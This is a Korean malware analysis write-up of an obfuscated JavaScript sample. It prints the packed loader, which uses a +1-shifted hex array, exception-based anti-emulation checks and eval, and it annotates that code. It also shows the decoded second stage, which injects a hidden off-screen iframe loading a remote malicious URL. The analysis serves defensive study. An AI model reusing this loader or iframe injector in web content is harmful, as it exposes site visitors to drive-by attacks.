1. 개요
이 샘플에는 여러 난독화 기법이 중첩되어 사용되어 있다.
1.1. 원본 소스코드
// 1.1 Obfuscated sample as captured: one collapsed statement run (the page wraps the long hex string).
// The hex array n holds the second stage; every value is 1 above the real character code, and the
// decode loop (eval(asq())-1) undoes that shift before eval("" + s) runs the result.
// Section 2.1 formats and annotates this code; section 2.2 shows the decoded second stage.
asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0xa,0xa,0x6a,0x67,0x21,0x29,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x74,0x43,0x7a,0x55,0x62,0x68,0x4f,0x62,0x6e,0x66,0x29,0x28,0x63,0x70,0x65,0x7a,0x28,0x2a,0x5c,0x31,0x5e,0x2a,0x7c,0xe,0xa,0xa,0xa,0x6a,0x67,0x73,0x62,0x6e,0x66,0x73,0x29,0x2a,0x3c,0xe,0xa,0xa,0x7e,0x21,0x66,0x6d,0x74,0x66,0x21,0x7c,0xe,0xa,0xa,0xa,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x23,0x3d,0x6a,0x67,0x73,0x62,0x6e,0x66,0x21,0x74,0x73,0x64,0x3e,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x64,0x69,0x77,0x62,0x73,0x6c,0x70,0x77,0x74,0x6c,0x6a,0x2f,0x6a,0x6f,0x67,0x70,0x30,0x65,0x45,0x79,0x4d,0x71,0x53,0x31,0x4d,0x39,0x52,0x58,0x31,0x49,0x55,0x51,0x48,0x31,0x4e,0x79,0x62,0x4d,0x31,0x62,0x7b,0x58,0x79,0x31,0x4f,0x4c,0x4a,0x51,0x31,0x36,0x4e,0x6d,0x44,0x31,0x58,0x32,0x37,0x74,0x30,0x28,0x21,0x78,0x6a,0x65,0x75,0x69,0x3e,0x28,0x32,0x31,0x31,0x28,0x21,0x69,0x66,0x6a,0x68,0x69,0x75,0x3e,0x28,0x32,0x31,0x31,0x28,0x21,0x74,0x75,0x7a,0x6d,0x66,0x3e,0x28,0x78,0x6a,0x65,0x75,0x69,0x3b,0x32,0x31,0x31,0x71,0x79,0x3c,0x69,0x66,0x6a,0x68,0x69,0x75,0x3b,0x32,0x31,0x31,0x71,0x79,0x3c,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x3b,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x3c,0x77,0x6a,0x74,0x6a,0x63,0x6a,0x6d,0x6a,0x75,0x7a,0x3b,0x69,0x6a,0x65,0x65,0x66,0x6f,0x3c,0x6d,0x66,0x67,0x75,0x3b,0x2e,0x32,0x31,0x31,0x31,0x31,0x71,0x79,0x3c,0x75,0x70,0x71,0x3b,0x31,0x3c,0x28,0x3f,0x3d,0x30,0x6a,0x67,0x73,0x62,0x6e,0x66,0x3f,0x23,0x2a,0x3c,0xe,0xa,0xa,0x7e,0xe,0xa,0xa,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x6a,0x67,0x73,0x62,0x6e,0x66,0x73,0x29,0x2a,0x7c,0xe,0xa,0xa,0xa,0x77,0x62,0x73,0x21,0x67,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x74,0x73,0x64,0x28,0x2d,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x64,0x69,0x77,0x62,0x73,0x6c,0x70,0x77,0x74,0x6c,0x6a,0x2f,0x6a,0x6f,0x67,0x70,0x30,0x65,0x45,0x79,0x4d,0x71,0x53,0x31,0x4d,0x39,0x52,0x58,0x31,0x49,0x55,0x51,0x48,0x31,0x4e,0x79,0x62,0x4d,0x31,0x62,0x7b,0x58,0x79,0x31,0x4f,0x4c,0x4a,0x51,0x31,0x36,0x4e,0x6d,0x44,0x31,0x58,0x32,0x37,0x74,0x30,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x3e,0x28,0x2e,0x32,0x31,0x31,0x31,0x31,0x71,0x79,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x77,0x6a,0x74,0x6a,0x63,0x6a,0x6d,0x6a,0x75,0x7a,0x3e,0x28,0x69,0x6a,0x65,0x65,0x66,0x6f,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x3e,0x28,0x31,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x3e,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x3e,0x28,0x31,0x28,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x78,0x6a,0x65,0x75,0x69,0x28,0x2d,0x28,0x32,0x31,0x31,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x69,0x66,0x6a,0x68,0x69,0x75,0x28,0x2d,0x28,0x32,0x31,0x31,0x28,0x2a,0x3c,0xe,0xa,0xa,0xa,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x74,0x43,0x7a,0x55,0x62,0x68,0x4f,0x62,0x6e,0x66,0x29,0x28,0x63,0x70,0x65,0x7a,0x28,0x2a,0x5c,0x31,0x5e,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x67,0x2a,0x3c,0xe,0xa,0xa,0x7e".split(",");h=2;s="";for(i=0;i-700!=0;i++){k=i;s=s.concat(ss(eval(asq())-1));}z=s;eval(""+s);}}}}
2. 분석
2.1. 난독화 소스코드 분석
asq = function () {
  return n[i]; // reads the globals n (hex-literal array) and i (loop index): yields the current element
}; // accessor used by the decode loop below; returns n[i] for whatever i is at call time
ww = window; // alias for window
ss = String.fromCharCode; // alias for String.fromCharCode, used by the decode loop
try {
  document.body = ~1 // assigns -2 to document.body -> throws in a real browser DOM
  // In JavaScript the tilde (~) is bitwise NOT: every bit of the operand is flipped.
  // In 8 bits, 0000 0001 becomes 1111 1110; the top bit is the sign bit, so in two's complement that is -2.
  // Convenient shortcut: ~n === -(n + 1).
} catch (dgsgsdg) {
  zz = 12 * 2 + 1 + 1; // dead computation, never read
  whwej = 12; // dead value, overwritten below before it is read
} {
  try {
    whwej = ~2; // whwej = -3
  }
  catch (agdsg) {
    whwej = 0; // not executed: ~2 cannot throw
  }
  if (whwej) { // if (-3): in JavaScript every non-zero number is truthy
    try {
      document.body++; // throws in a real browser DOM
    }
    catch (bawetawe) {
      if (ww.document) { // window.document is an object, hence truthy
        // Second-stage payload: comma-separated hex literals, each 1 above the real character code.
        // Analyst note: the decoder below is reachable only through this catch branch, so an
        // environment in which document.body++ does not throw never reaches eval() —
        // presumably an anti-emulation check; verify against the target engine.
        n = "0xa,0xa,0x6a,0x67,0x21,0x29,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x74,0x43,0x7a,0x55,0x62,0x68,0x4f,0x62,0x6e,0x66,0x29,0x28,0x63,0x70,0x65,0x7a,0x28,0x2a,0x5c,0x31,0x5e,0x2a,0x7c,0xe,0xa,0xa,0xa,0x6a,0x67,0x73,0x62,0x6e,0x66,0x73,0x29,0x2a,0x3c,0xe,0xa,0xa,0x7e,0x21,0x66,0x6d,0x74,0x66,0x21,0x7c,0xe,0xa,0xa,0xa,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x23,0x3d,0x6a,0x67,0x73,0x62,0x6e,0x66,0x21,0x74,0x73,0x64,0x3e,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x64,0x69,0x77,0x62,0x73,0x6c,0x70,0x77,0x74,0x6c,0x6a,0x2f,0x6a,0x6f,0x67,0x70,0x30,0x65,0x45,0x79,0x4d,0x71,0x53,0x31,0x4d,0x39,0x52,0x58,0x31,0x49,0x55,0x51,0x48,0x31,0x4e,0x79,0x62,0x4d,0x31,0x62,0x7b,0x58,0x79,0x31,0x4f,0x4c,0x4a,0x51,0x31,0x36,0x4e,0x6d,0x44,0x31,0x58,0x32,0x37,0x74,0x30,0x28,0x21,0x78,0x6a,0x65,0x75,0x69,0x3e,0x28,0x32,0x31,0x31,0x28,0x21,0x69,0x66,0x6a,0x68,0x69,0x75,0x3e,0x28,0x32,0x31,0x31,0x28,0x21,0x74,0x75,0x7a,0x6d,0x66,0x3e,0x28,0x78,0x6a,0x65,0x75,0x69,0x3b,0x32,0x31,0x31,0x71,0x79,0x3c,0x69,0x66,0x6a,0x68,0x69,0x75,0x3b,0x32,0x31,0x31,0x71,0x79,0x3c,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x3b,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x3c,0x77,0x6a,0x74,0x6a,0x63,0x6a,0x6d,0x6a,0x75,0x7a,0x3b,0x69,0x6a,0x65,0x65,0x66,0x6f,0x3c,0x6d,0x66,0x67,0x75,0x3b,0x2e,0x32,0x31,0x31,0x31,0x31,0x71,0x79,0x3c,0x75,0x70,0x71,0x3b,0x31,0x3c,0x28,0x3f,0x3d,0x30,0x6a,0x67,0x73,0x62,0x6e,0x66,0x3f,0x23,0x2a,0x3c,0xe,0xa,0xa,0x7e,0xe,0xa,0xa,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x6a,0x67,0x73,0x62,0x6e,0x66,0x73,0x29,0x2a,0x7c,0xe,0xa,0xa,0xa,0x77,0x62,0x73,0x21,0x67,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x74,0x73,0x64,0x28,0x2d,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x64,0x69,0x77,0x62,0x73,0x6c,0x70,0x77,0x74,0x6c,0x6a,0x2f,0x6a,0x6f,0x67,0x70,0x30,0x65,0x45,0x79,0x4d,0x71,0x53,0x31,0x4d,0x39,0x52,0x58,0x31,0x49,0x55,0x51,0x48,0x31,0x4e,0x79,0x62,0x4d,0x31,0x62,0x7b,0x58,0x79,0x31,0x4f,0x4c,0x4a,0x51,0x31,0x36,0x4e,0x6d,0x44,0x31,0x58,0x32,0x37,0x74,0x30,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x3e,0x28,0x2e,0x32,0x31,0x31,0x31,0x31,0x71,0x79,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x77,0x6a,0x74,0x6a,0x63,0x6a,0x6d,0x6a,0x75,0x7a,0x3e,0x28,0x69,0x6a,0x65,0x65,0x66,0x6f,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x3e,0x28,0x31,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x3e,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x3e,0x28,0x31,0x28,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x78,0x6a,0x65,0x75,0x69,0x28,0x2d,0x28,0x32,0x31,0x31,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x69,0x66,0x6a,0x68,0x69,0x75,0x28,0x2d,0x28,0x32,0x31,0x31,0x28,0x2a,0x3c,0xe,0xa,0xa,0xa,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x74,0x43,0x7a,0x55,0x62,0x68,0x4f,0x62,0x6e,0x66,0x29,0x28,0x63,0x70,0x65,0x7a,0x28,0x2a,0x5c,0x31,0x5e,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x67,0x2a,0x3c,0xe,0xa,0xa,0x7e".split(",");
        // split(",") turns the single string into an array of hex-literal strings ("0xa", "0x6a", ...)
        h = 2; // dead value
        s = ""; // accumulator for the decoded second stage
        for (i = 0; i - 700 != 0; i++) { // runs exactly 700 times (the loop stops when i reaches 700)
          k = i; // dead value
          s = s.concat(ss(eval(asq()) - 1));
          // i.e. s = s.concat(String.fromCharCode(eval(n[i]) - 1));
          // eval() converts the hex-literal string into a number, 1 is subtracted to undo the
          // packer's +1 shift, String.fromCharCode() turns the result into one character, and
          // concat() appends it to the decoded script
        }
        z = s; // dead value
        eval("" + s); // executes the reconstructed second stage (its decoded form is shown in section 2.2)
      }
    }
  }
}
2.2. 난독화 해제
// Decoded second stage. Two delivery paths lead to the same remote URL (treat it as an IoC):
// a DOM-built iframe when <body> already exists, document.write() of iframe markup otherwise.
// Either way the frame is declared 100x100 but placed at left:-10000px with visibility:hidden,
// so nothing is visible to the user — the hidden-off-screen-iframe pattern is what to flag
// when inspecting page content.
if (document.getElementsByTagName('body')[0]) {
  // is a <body> element present?
  iframer(); // yes: build and append the iframe through the DOM
} else {
  document.write("<iframe src='http://chvarkovski.info/dDxLpR0L8QW0HTPG0MxaL0azWx0NKIP05MlC0W16s/'width='100' height='100' style='width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
} // no <body> yet (presumably the script runs before it is parsed): write the markup directly
/**
 * Builds the hidden iframe through the DOM and appends it to <body>.
 * The src is the same remote URL as the document.write() branch; width/height are 100,
 * but position:absolute, left:-10000px and visibility:hidden keep it out of view.
 * Requires a <body> element to exist — the caller checks for it first.
 */
function iframer() {
  var f = document.createElement('iframe');
  f.setAttribute('src', 'http://chvarkovski.info/dDxLpR0L8QW0HTPG0MxaL0azWx0NKIP05MlC0W16s/');
  f.style.left = '-10000px'; // pushed far off-screen
  f.style.visibility = 'hidden';
  f.style.top = '0';
  f.style.position = 'absolute';
  f.style.top = '0'; // redundant repeat of the assignment two lines above
  f.setAttribute('width', '100');
  f.setAttribute('height', '100');
  document.getElementsByTagName('body')[0].appendChild(f);
  // append the configured iframe to <body>; this is the point at which the remote URL is loaded
}
iframe을 선언하는 방식 중 DOM을 이용하여 하나의 요소로 생성할 수 있다. DOM을 이용하려면 body 태그가 필요한데, 이 태그는 자바스크립트가 아닌 HTML 태그이다. 자바스크립트 엔진만으로 난독화를 분석하는 도구는 이러한 HTML 태그를 처리하지 못하므로, 이 방식은 하나의 Anti-DeObfuscation 기법이라 할 수 있다.
3. 정리
- 자바스크립트 언어의 특징으로 0 값이 아닌 숫자는 모두 true로 인식
- 음수 값을 틸드 연산을 이용하여 표현
- 16진수 값을 변형
- 조건부 실행
- DOM 객체를 이용한 자바스크립트 실행
- width, height 값이 시각적으로 보일 수 있는 크기라도 감출 수 있음